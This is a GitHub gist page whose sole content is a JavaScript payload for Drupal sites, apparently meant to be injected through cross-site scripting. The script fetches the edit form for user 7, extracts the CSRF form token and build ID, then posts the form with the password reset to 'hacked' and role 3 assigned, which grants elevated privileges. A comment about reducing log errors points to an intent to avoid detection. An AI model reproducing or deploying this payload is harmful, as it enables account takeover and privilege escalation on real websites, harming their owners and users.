-
-
Save abhiteshdas/6333988 to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // Test for the presence of jquery. | |
| if (typeof jQuery == 'function') { | |
| // Fetch a correct token from user/1/edit because we will need it to | |
| // successfully submit the user edit form later. | |
| // TODO: Include a check to increase the chance that the current user is admin, | |
| // which will reduce the number of access denied error messages in the log. | |
| jQuery.get(Drupal.settings.basePath + 'user/7/edit', | |
| function (data, status) { | |
| if (status == 'success') { | |
| // Extract the token and other required data | |
| var matches = data.match(/name="name" value="([a-zA-Z0-9]*)"/); | |
| var name = matches[1]; | |
| var mail = '[email protected]'; | |
| var matches = data.match(/name="form_token" value="([a-zA-Z0-9_-]*)"/); | |
| var token = matches[1]; | |
| var matches = data.match(/name="form_build_id" value="(form-[a-zA-Z0-9_-]*)"/); | |
| var build_id = matches[1]; | |
| // Post the minimum amount of fields. Other fields get their default values. | |
| var payload = { | |
| "name": name, | |
| "mail": mail, | |
| "form_id": 'user_profile_form', | |
| "form_token": token, | |
| build_id : build_id, | |
| "pass[pass1]": 'hacked', | |
| "pass[pass2]": 'hacked', | |
| "roles[3]": 3 | |
| }; | |
| jQuery.post(Drupal.settings.basePath + 'user/7/edit', payload); | |
| } | |
| } | |
| ); | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment